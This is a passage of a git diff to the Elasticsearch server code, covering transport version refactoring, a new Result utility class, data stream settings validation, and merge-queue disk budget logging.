(boolean) args[14], + // If replicated (args[5]) is null or exists and is false, and the failure index list (args[13]) is null or + // exists and is empty, then force the rollover on write field to true. If none of those conditions are met, + // then use the rollover on write value (args[14]) present in the parser. + ((args[5] == null || ((boolean) args[5] == false)) && (args[13] == null || ((List) args[13]).isEmpty())) + || (args[14] != null && (boolean) args[14]), (DataStreamAutoShardingEvent) args[15] ) ) diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/DataStreamMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/DataStreamMetadata.java index ebba302a14175..769bd8afc6ee6 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/DataStreamMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/DataStreamMetadata.java @@ -11,7 +11,6 @@ import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -218,7 +217,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -315,7 +314,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/IndexGraveyard.java b/server/src/main/java/org/elasticsearch/cluster/metadata/IndexGraveyard.java index ba1f236ac75b5..1b979766c90dd 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/IndexGraveyard.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/IndexGraveyard.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.metadata; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.NamedDiff; import org.elasticsearch.common.io.stream.StreamInput; @@ -90,7 +89,7 @@ public String 
getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override @@ -336,7 +335,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/MetadataDataStreamsService.java b/server/src/main/java/org/elasticsearch/cluster/metadata/MetadataDataStreamsService.java index 40a2e23241e83..de7c338c1083f 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/MetadataDataStreamsService.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/MetadataDataStreamsService.java @@ -452,10 +452,9 @@ private DataStream createDataStreamForUpdatedDataStreamSettings( ProjectMetadata projectMetadata = clusterState.metadata().getProject(projectId); Map dataStreamMap = projectMetadata.dataStreams(); DataStream dataStream = dataStreamMap.get(dataStreamName); - Settings existingSettings = dataStream.getSettings(); + Settings existingDataStreamSettings = dataStream.getSettings(); - Template.Builder templateBuilder = Template.builder(); - Settings.Builder mergedSettingsBuilder = Settings.builder().put(existingSettings).put(settingsOverrides); + Settings.Builder mergedSettingsBuilder = Settings.builder().put(existingDataStreamSettings).put(settingsOverrides); /* * A null value for a setting override means that we remove it from the data stream, and let the value from the template (if any) * be used. @@ -465,18 +464,14 @@ private DataStream createDataStreamForUpdatedDataStreamSettings( mergedSettingsBuilder.remove(key); } }); - Settings mergedSettings = mergedSettingsBuilder.build(); + Settings mergedDataStreamSettings = mergedSettingsBuilder.build(); final ComposableIndexTemplate template = lookupTemplateForDataStream(dataStreamName, projectMetadata); - ComposableIndexTemplate mergedTemplate = template.mergeSettings(mergedSettings); - MetadataIndexTemplateService.validateTemplate( - mergedTemplate.template().settings(), - mergedTemplate.template().mappings(), - indicesService - ); + Settings templateSettings = MetadataIndexTemplateService.resolveSettings(template, projectMetadata.componentTemplates()); + Settings mergedEffectiveSettings = templateSettings.merge(mergedDataStreamSettings); + MetadataIndexTemplateService.validateTemplate(mergedEffectiveSettings, ComposableIndexTemplate.EMPTY_MAPPINGS, indicesService); - templateBuilder.settings(mergedSettingsBuilder); - return dataStream.copy().setSettings(mergedSettings).build(); + return dataStream.copy().setSettings(mergedDataStreamSettings).build(); } private static void addBackingIndex( diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/NodesShutdownMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/NodesShutdownMetadata.java index 63810f2b4a3bc..070eb006ea6d4 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/NodesShutdownMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/NodesShutdownMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.metadata; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -172,7 +171,7 @@ public String getWriteableName() { 
@Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -235,7 +234,7 @@ static Diff readNodesDiffFrom(StreamInput in) throws @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/RepositoriesMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/RepositoriesMetadata.java index 512d7e6e551b8..1cdff3f844b10 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/RepositoriesMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/RepositoriesMetadata.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.NamedDiff; @@ -180,7 +179,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } public RepositoriesMetadata(StreamInput in) throws IOException { diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/StreamsMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/StreamsMetadata.java index 99758350559d3..7ce18541f9413 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/StreamsMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/StreamsMetadata.java @@ -17,7 +17,10 @@ import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.xcontent.ChunkedToXContentHelper; +import org.elasticsearch.xcontent.ConstructingObjectParser; +import org.elasticsearch.xcontent.ParseField; import org.elasticsearch.xcontent.ToXContent; +import org.elasticsearch.xcontent.XContentParser; import java.io.IOException; import java.util.EnumSet; @@ -32,6 +35,14 @@ public class StreamsMetadata extends AbstractNamedDiffable PARSER = new ConstructingObjectParser<>(TYPE, false, args -> { + boolean logsEnabled = (boolean) args[0]; + return new StreamsMetadata(logsEnabled); + }); + static { + PARSER.declareBoolean(ConstructingObjectParser.constructorArg(), LOGS_ENABLED); + } public boolean logsEnabled; @@ -79,7 +90,9 @@ public void writeTo(StreamOutput out) throws IOException { @Override public Iterator toXContentChunked(ToXContent.Params params) { - return Iterators.concat(ChunkedToXContentHelper.chunk((builder, bParams) -> builder.field("logs_enabled", logsEnabled))); + return Iterators.concat( + ChunkedToXContentHelper.chunk((builder, bParams) -> builder.field(LOGS_ENABLED.getPreferredName(), logsEnabled)) + ); } @Override @@ -95,4 +108,8 @@ public boolean equals(Object o) { public int hashCode() { return Objects.hashCode(logsEnabled); } + + public static StreamsMetadata fromXContent(XContentParser parser) throws IOException { + return PARSER.parse(parser, null); + } } diff --git a/server/src/main/java/org/elasticsearch/cluster/version/CompatibilityVersions.java b/server/src/main/java/org/elasticsearch/cluster/version/CompatibilityVersions.java index f4f9d2dbc1e34..3c8438c93c977 100644 --- a/server/src/main/java/org/elasticsearch/cluster/version/CompatibilityVersions.java +++ 
b/server/src/main/java/org/elasticsearch/cluster/version/CompatibilityVersions.java @@ -40,7 +40,7 @@ public record CompatibilityVersions( Map systemIndexMappingsVersion ) implements Writeable, ToXContentFragment { - public static final CompatibilityVersions EMPTY = new CompatibilityVersions(TransportVersions.MINIMUM_COMPATIBLE, Map.of()); + public static final CompatibilityVersions EMPTY = new CompatibilityVersions(TransportVersion.minimumCompatible(), Map.of()); /** * Constructs a VersionWrapper collecting all the minimum versions from the values of the map. diff --git a/server/src/main/java/org/elasticsearch/common/bytes/BytesReference.java b/server/src/main/java/org/elasticsearch/common/bytes/BytesReference.java index ddcfc1ea7eed8..26df48fc9ec24 100644 --- a/server/src/main/java/org/elasticsearch/common/bytes/BytesReference.java +++ b/server/src/main/java/org/elasticsearch/common/bytes/BytesReference.java @@ -159,7 +159,10 @@ static BytesReference fromByteArray(ByteArray byteArray, int length) { BytesReference slice(int from, int length); /** - * The amount of memory used by this BytesReference + * The amount of memory used by this BytesReference. + *

+ * Note that this is not always the same as length and can vary by implementation. + *

*/ long ramBytesUsed(); diff --git a/server/src/main/java/org/elasticsearch/common/util/Result.java b/server/src/main/java/org/elasticsearch/common/util/Result.java new file mode 100644 index 0000000000000..57bcb56861da9 --- /dev/null +++ b/server/src/main/java/org/elasticsearch/common/util/Result.java @@ -0,0 +1,102 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.common.util; + +import org.elasticsearch.common.CheckedSupplier; + +import java.util.Optional; + +/** + * A wrapper around either + *
    + *
  • a successful result of parameterized type {@code V}
  • + *
  • a failure with exception type {@code E}
  • + *
+ */ +public abstract class Result implements CheckedSupplier { + + public static Result of(V value) { + return new Success<>(value); + } + + public static Result failure(E exception) { + return new Failure<>(exception); + } + + private Result() {} + + public abstract V get() throws E; + + public abstract Optional failure(); + + public abstract boolean isSuccessful(); + + public boolean isFailure() { + return isSuccessful() == false; + }; + + public abstract Optional asOptional(); + + private static class Success extends Result { + private final V value; + + Success(V value) { + this.value = value; + } + + @Override + public V get() throws E { + return value; + } + + @Override + public Optional failure() { + return Optional.empty(); + } + + @Override + public boolean isSuccessful() { + return true; + } + + @Override + public Optional asOptional() { + return Optional.of(value); + } + } + + private static class Failure extends Result { + private final E exception; + + Failure(E exception) { + this.exception = exception; + } + + @Override + public V get() throws E { + throw exception; + } + + @Override + public Optional failure() { + return Optional.of(exception); + } + + @Override + public boolean isSuccessful() { + return false; + } + + @Override + public Optional asOptional() { + return Optional.empty(); + } + } +} diff --git a/server/src/main/java/org/elasticsearch/common/xcontent/support/XContentMapValues.java b/server/src/main/java/org/elasticsearch/common/xcontent/support/XContentMapValues.java index a1ba3759c7854..74bf3b9b5ff62 100644 --- a/server/src/main/java/org/elasticsearch/common/xcontent/support/XContentMapValues.java +++ b/server/src/main/java/org/elasticsearch/common/xcontent/support/XContentMapValues.java @@ -560,6 +560,9 @@ public static Map nodeMapValue(Object node, String desc) { * Otherwise the node is treated as a comma-separated string. 
*/ public static String[] nodeStringArrayValue(Object node) { + if (node == null) { + throw new ElasticsearchParseException("Expected a list of strings but got null"); + } if (isArray(node)) { List list = (List) node; String[] arr = new String[list.size()]; diff --git a/server/src/main/java/org/elasticsearch/index/IndexVersions.java b/server/src/main/java/org/elasticsearch/index/IndexVersions.java index 6ff33cf05d51f..2e464afa72b76 100644 --- a/server/src/main/java/org/elasticsearch/index/IndexVersions.java +++ b/server/src/main/java/org/elasticsearch/index/IndexVersions.java @@ -145,6 +145,7 @@ private static Version parseUnchecked(String version) { public static final IndexVersion MAPPER_TEXT_MATCH_ONLY_MULTI_FIELDS_DEFAULT_NOT_STORED_8_19 = def(8_533_0_00, Version.LUCENE_9_12_1); public static final IndexVersion UPGRADE_TO_LUCENE_9_12_2 = def(8_534_0_00, Version.LUCENE_9_12_2); public static final IndexVersion SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X = def(8_535_0_00, Version.LUCENE_9_12_2); + public static final IndexVersion MATCH_ONLY_TEXT_STORED_AS_BYTES_BACKPORT_8_X = def(8_536_0_00, Version.LUCENE_9_12_2); public static final IndexVersion UPGRADE_TO_LUCENE_10_0_0 = def(9_000_0_00, Version.LUCENE_10_0_0); public static final IndexVersion LOGSDB_DEFAULT_IGNORE_DYNAMIC_BEYOND_LIMIT = def(9_001_0_00, Version.LUCENE_10_0_0); public static final IndexVersion TIME_BASED_K_ORDERED_DOC_ID = def(9_002_0_00, Version.LUCENE_10_0_0); @@ -178,6 +179,7 @@ private static Version parseUnchecked(String version) { public static final IndexVersion UPGRADE_TO_LUCENE_10_2_2 = def(9_030_0_00, Version.LUCENE_10_2_2); public static final IndexVersion SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT = def(9_031_0_00, Version.LUCENE_10_2_2); public static final IndexVersion DEFAULT_DENSE_VECTOR_TO_BBQ_HNSW = def(9_032_0_00, Version.LUCENE_10_2_2); + public static final IndexVersion MATCH_ONLY_TEXT_STORED_AS_BYTES = def(9_033_0_00, Version.LUCENE_10_2_2); /* * STOP! READ THIS FIRST! 
No, really, diff --git a/server/src/main/java/org/elasticsearch/index/codec/tsdb/es819/DocValuesConsumerUtil.java b/server/src/main/java/org/elasticsearch/index/codec/tsdb/es819/DocValuesConsumerUtil.java index c29585f173316..4e9bf9c09a3b0 100644 --- a/server/src/main/java/org/elasticsearch/index/codec/tsdb/es819/DocValuesConsumerUtil.java +++ b/server/src/main/java/org/elasticsearch/index/codec/tsdb/es819/DocValuesConsumerUtil.java @@ -24,7 +24,7 @@ class DocValuesConsumerUtil { record MergeStats(boolean supported, long sumNumValues, int sumNumDocsWithField, int minLength, int maxLength) {} - static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, MergeState mergeState, FieldInfo fieldInfo) { + static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, MergeState mergeState, FieldInfo mergedFieldInfo) { if (optimizedMergeEnabled == false || mergeState.needsIndexSort == false) { return UNSUPPORTED; } @@ -42,6 +42,10 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me int maxLength = 0; for (int i = 0; i < mergeState.docValuesProducers.length; i++) { + final FieldInfo fieldInfo = mergeState.fieldInfos[i].fieldInfo(mergedFieldInfo.name); + if (fieldInfo == null) { + continue; + } DocValuesProducer docValuesProducer = mergeState.docValuesProducers[i]; if (docValuesProducer instanceof FilterDocValuesProducer filterDocValuesProducer) { docValuesProducer = filterDocValuesProducer.getIn(); @@ -60,6 +64,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me if (entry != null) { sumNumValues += entry.numValues; sumNumDocsWithField += entry.numDocsWithField; + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } case SORTED_NUMERIC -> { @@ -67,6 +74,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me if (entry != null) { sumNumValues += entry.numValues; sumNumDocsWithField += entry.numDocsWithField; + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } case SORTED -> { @@ -74,6 +84,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me if (entry != null) { sumNumValues += entry.ordsEntry.numValues; sumNumDocsWithField += entry.ordsEntry.numDocsWithField; + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } case SORTED_SET -> { @@ -86,6 +99,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me sumNumValues += entry.ordsEntry.numValues; sumNumDocsWithField += entry.ordsEntry.numDocsWithField; } + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } case BINARY -> { @@ -94,6 +110,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me sumNumDocsWithField += entry.numDocsWithField; minLength = Math.min(minLength, entry.minLength); maxLength = Math.max(maxLength, entry.maxLength); + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } default -> throw new IllegalStateException("unexpected doc values producer type: " + fieldInfo.getDocValuesType()); diff --git 
a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormat.java b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormat.java index 5df81c35bbd40..146164b55f00a 100644 --- a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormat.java +++ b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormat.java @@ -87,7 +87,7 @@ */ public class ES818BinaryQuantizedVectorsFormat extends FlatVectorsFormat { - static final boolean USE_DIRECT_IO = Boolean.parseBoolean(System.getProperty("vector.rescoring.directio", "true")); + public static final boolean USE_DIRECT_IO = Boolean.parseBoolean(System.getProperty("vector.rescoring.directio", "false")); public static final String BINARIZED_VECTOR_COMPONENT = "BVEC"; public static final String NAME = "ES818BinaryQuantizedVectorsFormat"; diff --git a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsReader.java b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsReader.java index dd3e59be26460..6de775c4773b5 100644 --- a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsReader.java +++ b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsReader.java @@ -65,7 +65,7 @@ public class ES818BinaryQuantizedVectorsReader extends FlatVectorsReader impleme private static final long SHALLOW_SIZE = RamUsageEstimator.shallowSizeOfInstance(ES818BinaryQuantizedVectorsReader.class); - private final Map fields = new HashMap<>(); + private final Map fields; private final IndexInput quantizedVectorData; private final FlatVectorsReader rawVectorsReader; private final ES818BinaryFlatVectorsScorer vectorScorer; @@ -77,6 +77,7 @@ public class ES818BinaryQuantizedVectorsReader extends FlatVectorsReader impleme ES818BinaryFlatVectorsScorer vectorsScorer ) throws IOException { super(vectorsScorer); + this.fields = new HashMap<>(); this.vectorScorer = vectorsScorer; this.rawVectorsReader = rawVectorsReader; int versionMeta = -1; @@ -120,6 +121,24 @@ public class ES818BinaryQuantizedVectorsReader extends FlatVectorsReader impleme } } + private ES818BinaryQuantizedVectorsReader(ES818BinaryQuantizedVectorsReader clone, FlatVectorsReader rawVectorsReader) { + super(clone.vectorScorer); + this.rawVectorsReader = rawVectorsReader; + this.vectorScorer = clone.vectorScorer; + this.quantizedVectorData = clone.quantizedVectorData; + this.fields = clone.fields; + } + + // For testing + FlatVectorsReader getRawVectorsReader() { + return rawVectorsReader; + } + + @Override + public FlatVectorsReader getMergeInstance() { + return new ES818BinaryQuantizedVectorsReader(this, rawVectorsReader.getMergeInstance()); + } + private void readFields(ChecksumIndexInput meta, FieldInfos infos) throws IOException { for (int fieldNumber = meta.readInt(); fieldNumber != -1; fieldNumber = meta.readInt()) { FieldInfo info = infos.fieldInfo(fieldNumber); diff --git a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/MergeReaderWrapper.java b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/MergeReaderWrapper.java index 4d9d7e03848c8..e74b0aad12723 100644 --- a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/MergeReaderWrapper.java +++ b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/MergeReaderWrapper.java @@ -36,6 +36,11 
@@ protected MergeReaderWrapper(FlatVectorsReader mainReader, FlatVectorsReader mer this.mergeReader = mergeReader; } + // For testing + FlatVectorsReader getMainReader() { + return mainReader; + } + @Override public RandomVectorScorer getRandomVectorScorer(String field, float[] target) throws IOException { return mainReader.getRandomVectorScorer(field, target); diff --git a/server/src/main/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorService.java b/server/src/main/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorService.java index f6e9257200002..9efb582007aaf 100644 --- a/server/src/main/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorService.java +++ b/server/src/main/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorService.java @@ -35,6 +35,7 @@ import java.util.IdentityHashMap; import java.util.Iterator; import java.util.List; +import java.util.Locale; import java.util.Map; import java.util.PriorityQueue; import java.util.Set; @@ -552,6 +553,8 @@ private static ByteSizeValue getFreeBytesThreshold( } static class MergeTaskPriorityBlockingQueue extends PriorityBlockingQueueWithBudget { + private static final Logger LOGGER = LogManager.getLogger(MergeTaskPriorityBlockingQueue.class); + MergeTaskPriorityBlockingQueue() { // by default, start with 0 budget (so takes on this queue will always block until the first {@link #updateBudget} is invoked) // use the estimated *remaining* merge size as the budget function so that the disk space budget of elements is updated @@ -567,6 +570,55 @@ long getAvailableBudget() { MergeTask peekQueue() { return enqueuedByBudget.peek().v1(); } + + @Override + void postBudgetUpdate() { + assert super.lock.isHeldByCurrentThread(); + Tuple head = enqueuedByBudget.peek(); + if (head != null && head.v2() > availableBudget) { + LOGGER.warn( + String.format( + Locale.ROOT, + "There are merge tasks enqueued but there's insufficient disk space available to execute them " + + "(the smallest merge task requires [%d] bytes, but the available disk space is only [%d] bytes)", + head.v2(), + availableBudget + ) + ); + if (LOGGER.isDebugEnabled()) { + if (unreleasedBudgetPerElement.isEmpty()) { + LOGGER.debug( + String.format( + Locale.ROOT, + "There are no merge tasks currently running, " + + "but there are [%d] enqueued ones that are blocked because of insufficient disk space " + + "(the smallest merge task requires [%d] bytes, but the available disk space is only [%d] bytes)", + enqueuedByBudget.size(), + head.v2(), + availableBudget + ) + ); + } else { + StringBuilder messageBuilder = new StringBuilder(); + messageBuilder.append("The following merge tasks are currently running ["); + for (var runningMergeTask : super.unreleasedBudgetPerElement.entrySet()) { + messageBuilder.append(runningMergeTask.getKey().element().toString()); + messageBuilder.append(" with disk space budgets in bytes ").append(runningMergeTask.getValue()).append(" , "); + } + messageBuilder.delete(messageBuilder.length() - 3, messageBuilder.length()); + messageBuilder.append("], and there are [") + .append(enqueuedByBudget.size()) + .append("] additional enqueued ones that are blocked because of insufficient disk space"); + messageBuilder.append(" (the smallest merge task requires [") + .append(head.v2()) + .append("] bytes, but the available disk space is only [") + .append(availableBudget) + .append("] bytes)"); + LOGGER.debug(messageBuilder.toString()); + } + } + } + } } /** @@ -576,7 +628,7 @@ MergeTask peekQueue() { static class 
PriorityBlockingQueueWithBudget { private final ToLongFunction budgetFunction; protected final PriorityQueue> enqueuedByBudget; - private final IdentityHashMap unreleasedBudgetPerElement; + protected final IdentityHashMap unreleasedBudgetPerElement; private final ReentrantLock lock; private final Condition elementAvailable; protected long availableBudget; @@ -637,15 +689,23 @@ void updateBudget(long availableBudget) { // updates the budget of enqueued elements (and possibly reorders the priority queue) updateBudgetOfEnqueuedElementsAndReorderQueue(); // update the budget of dequeued, but still in-use elements (these are the elements that are consuming budget) - unreleasedBudgetPerElement.replaceAll((e, v) -> budgetFunction.applyAsLong(e.element())); + unreleasedBudgetPerElement.replaceAll((e, v) -> v.updateBudgetEstimation(budgetFunction.applyAsLong(e.element()))); // the available budget is decreased by the budget of still in-use elements (dequeued elements that are still in-use) - this.availableBudget -= unreleasedBudgetPerElement.values().stream().mapToLong(i -> i).sum(); + this.availableBudget -= unreleasedBudgetPerElement.values() + .stream() + .mapToLong(i -> i.latestBudgetEstimationForElement) + .sum(); elementAvailable.signalAll(); + postBudgetUpdate(); } finally { lock.unlock(); } } + void postBudgetUpdate() { + assert lock.isHeldByCurrentThread(); + }; + private void updateBudgetOfEnqueuedElementsAndReorderQueue() { assert this.lock.isHeldByCurrentThread(); int queueSizeBefore = enqueuedByBudget.size(); @@ -686,7 +746,7 @@ private ElementWithReleasableBudget newElementWithReleasableBudget(E element, lo ElementWithReleasableBudget elementWithReleasableBudget = new ElementWithReleasableBudget(element); assert this.lock.isHeldByCurrentThread(); // the taken element holds up some budget - var prev = this.unreleasedBudgetPerElement.put(elementWithReleasableBudget, budget); + var prev = this.unreleasedBudgetPerElement.put(elementWithReleasableBudget, new Budgets(budget, budget, this.availableBudget)); assert prev == null; this.availableBudget -= budget; assert this.availableBudget >= 0L; @@ -736,6 +796,16 @@ E element() { return element; } } + + record Budgets(long initialBudgetEstimationForElement, long latestBudgetEstimationForElement, long initialTotalAvailableBudget) { + Budgets updateBudgetEstimation(long latestBudgetEstimationForElement) { + return new Budgets( + this.initialBudgetEstimationForElement, + latestBudgetEstimationForElement, + this.initialTotalAvailableBudget + ); + } + } } private static long newTargetIORateBytesPerSec( diff --git a/server/src/main/java/org/elasticsearch/index/fielddata/IndexNumericFieldData.java b/server/src/main/java/org/elasticsearch/index/fielddata/IndexNumericFieldData.java index 9956f8105b079..86d962f55a558 100644 --- a/server/src/main/java/org/elasticsearch/index/fielddata/IndexNumericFieldData.java +++ b/server/src/main/java/org/elasticsearch/index/fielddata/IndexNumericFieldData.java @@ -146,12 +146,21 @@ public SortField sortField( boolean reverse ) { SortField sortField = sortField(missingValue, sortMode, nested, reverse); - // we introduced INT sort type in 8.19 and from 9.1 - if (getNumericType().sortFieldType != SortField.Type.INT + if (getNumericType() == NumericType.DATE_NANOSECONDS + && indexCreatedVersion.before(IndexVersions.V_7_14_0) + && missingValue == null + && Long.valueOf(0L).equals(sortField.getMissingValue())) { + // 7.14 changed the default missing value of sort on date_nanos, from Long.MIN_VALUE + // to 0L - for 
compatibility we require to a missing value of MIN_VALUE to allow to + // open the index. + sortField.setMissingValue(Long.MIN_VALUE); + return sortField; + } else if (getNumericType().sortFieldType != SortField.Type.INT + // we introduced INT sort type in 8.19 and from 9.1 || indexCreatedVersion.onOrAfter(IndexVersions.INDEX_INT_SORT_INT_TYPE) || indexCreatedVersion.between(IndexVersions.INDEX_INT_SORT_INT_TYPE_8_19, UPGRADE_TO_LUCENE_10_0_0)) { - return sortField; - } + return sortField; + } if ((sortField instanceof SortedNumericSortField) == false) { return sortField; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapper.java index 22b198b10a7ad..f419d87d008fe 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapper.java @@ -98,11 +98,11 @@ protected void writeExtent(BlockLoader.IntBuilder builder, Extent extent) { public BlockLoader.AllReader reader(LeafReaderContext context) throws IOException { return new BlockLoader.AllReader() { @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { var binaryDocValues = context.reader().getBinaryDocValues(fieldName); var reader = new GeometryDocValueReader(); - try (var builder = factory.ints(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (var builder = factory.ints(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(binaryDocValues, docs.get(i), reader, builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/ArraySourceValueFetcher.java b/server/src/main/java/org/elasticsearch/index/mapper/ArraySourceValueFetcher.java index 6c9c88f767617..fa835e4356667 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/ArraySourceValueFetcher.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/ArraySourceValueFetcher.java @@ -56,7 +56,7 @@ public ArraySourceValueFetcher(Set sourcePaths, Object nullValue) { @Override public List fetchValues(Source source, int doc, List ignoredValues) { - List values = new ArrayList<>(); + ArrayList values = new ArrayList<>(); for (String path : sourcePaths) { Object sourceValue = source.extractValue(path, nullValue); if (sourceValue == null) { @@ -70,6 +70,7 @@ public List fetchValues(Source source, int doc, List ignoredValu ignoredValues.add(sourceValue); } } + values.trimToSize(); return values; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/BlockDocValuesReader.java index 363e956f1b211..850a2c0bc99f9 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BlockDocValuesReader.java @@ -124,10 +124,10 @@ private static class SingletonLongs extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.LongBuilder builder = factory.longsFromDocValues(docs.count())) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try 
